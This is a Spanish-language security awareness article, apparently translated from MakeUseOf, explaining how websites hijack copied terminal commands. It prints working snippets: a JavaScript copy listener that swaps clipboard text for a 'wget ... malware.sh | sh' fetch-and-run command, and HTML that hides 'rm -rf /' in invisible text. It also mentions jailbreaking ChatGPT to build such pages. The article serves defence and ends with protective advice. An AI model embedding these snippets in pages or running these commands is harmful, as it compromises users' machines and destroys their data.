Desde computadoras hasta teléfonos
móviles, copiar y pegar prevalece en
todas partes. Hace la vida más fácil y te ahorra tiempo ya que no tienes que
escribir comandos largos ni textos redundantes. Sin embargo, si no eres lo
suficientemente cuidadoso, puedes ser hackeado simplemente copiando y pegando
comandos en la terminal de tu
computadora.
Aquí aprenderemos cómo copiar y pegar
puede hacer que te hackeen y qué debes hacer para evitarlo.
Por qué no
deberías copiar y pegar comandos
Ya sea que seas nuevo en el uso de la línea de comandos o sea un veterano,
puedes sentirte tentado a copiar y pegar comandos de Internet para ahorrar
tiempo y realizar el trabajo real. Sin embargo, debes tener en cuenta que los
sitios maliciosos en realidad están utilizando cuadros de código como armas
para inyectar código malicioso cada vez que copias y pegas comandos
directamente en la terminal.
Estos atacantes están utilizando
varios trucos de interfaz para
ocultar comandos maliciosos detrás de un código que parece inofensivo.
Un comando como sudo apt-get update
&& apt-get update normalmente debería actualizar los repositorios y los paquetes en un sistema Linux. Sin
embargo, si no lo sabes y copias y pegas este comando directamente en tu
terminal, es posible que sin saberlo estés ejecutando código de malware con
privilegios de root debido al prefijo sudo.
En el peor de los casos, esto podría
resultar en una toma total de control de tu sistema o incluso en un ataque de ransomware. Pero ¿Cómo
hacen esto los atacantes? ¿Cómo se pueden ocultar comandos maliciosos detrás de
código inofensivo?
Cómo
funcionan los exploits de código malicioso
Este exploit se puede llevar a cabo
utilizando JavaScript ingeniosamente diseñado o incluso HTML básico. JavaScript
tiene un mecanismo llamado EventListener. Los eventos son acciones que pueden
ocurrir en el navegador, como hacer clic en un botón, enviar un formulario,
mover el mouse, presionar teclas o cambiar el tamaño de la ventana.
EventListener, como su nombre indica,
permite que una aplicación web reaccione a ciertos eventos desencadenados por la
acción del usuario. Las páginas web maliciosas aprovechan este mecanismo
legítimo y útil capturando el evento en el que un usuario copia texto y
reemplazando el texto inofensivo con código malicioso.
Aquí está el código de explotación
principal utilizado para este truco:
<script>
document.addEventListener('copy', function(event) {
event.preventDefault();
const copiedText = "wget http://localhost:8000/malware.sh | sh";
event.clipboardData.setData('text/plain', copiedText);
});
</script>
Aquí hay otra demostración que no
requiere JavaScript y usa HTML básico:
<p>
sudo apt-get install google-chrome-stable
<span style=«color:white;font-size:0pt;»>rm -rf /</span>
</p>
Esto crea un texto blanco invisible,
que oculta efectivamente el comando malicioso «rm -rf /» y la
etiqueta <br> crea un salto de línea para que algunas terminales ejecuten
inmediatamente el código al pegarlo. Se podría pensar que se requieren
conocimientos sólidos de programación y desarrollo web para llevar a cabo este
ataque, pero, en realidad, es bastante fácil.
Incluso si un atacante no tiene
ningún conocimiento de JavaScript o desarrollo web, puede crear malware fácilmente utilizando ChatGPT. Con las indicaciones
adecuadas, uno puede hacer jailbreak a ChatGPT fácilmente
y hacer que cree páginas web maliciosas que utilicen este truco.
Cómo puedes
protegerte
No existe una forma concreta de
protegerse contra ataques de códigos maliciosos. Claro, puedes no permitir
JavaScript para sitios sospechosos, pero, por su naturaleza, probablemente no
te permitirán navegar sin JavaScript activado.
Además, para el método CSS (Hojas de Estilo en Cascada), no existe
una defensa concreta contra comandos maliciosos ya que sigue siendo un código
CSS válido (es decir, no tiene nada de malo, pero la intención sigue siendo
maliciosa). La mejor manera de protegerse sería simplemente seguir una higiene
básica en Internet y ser ingenioso.
No visites enlaces desconocidos y
asegúrate de pegar siempre el comando que estás copiando de Internet en un
editor de texto antes de pegarlo en la terminal. Cíñete a recursos de código
legítimos y de buena reputación para asegurarte de no recibir código malicioso
en tu línea de comando.
Además, algunas terminales, como la terminal xfce4, vienen preequipados
con protección para copiar y pegar. Mostrará una ventana emergente que te dirá
exactamente qué se ejecutará tan pronto como pegues un comando en tu terminal.
Comprueba si tu terminal también tiene un mecanismo similar y actívalo.
La
ejecución de código malicioso es muy peligrosa
Incluso si tienes instalado un antivirus, ciertas formas
de ejecución de código malicioso aún pueden traspasar las barreras protectoras
de tu dispositivo. Por eso es fundamental tener cuidado con el código que
copias en línea y emplear medidas de protección siempre que sea posible para
mantenerse a salvo.
Fuente: MakeUseOf
7 juegos para Linux que puedes jugar en la terminal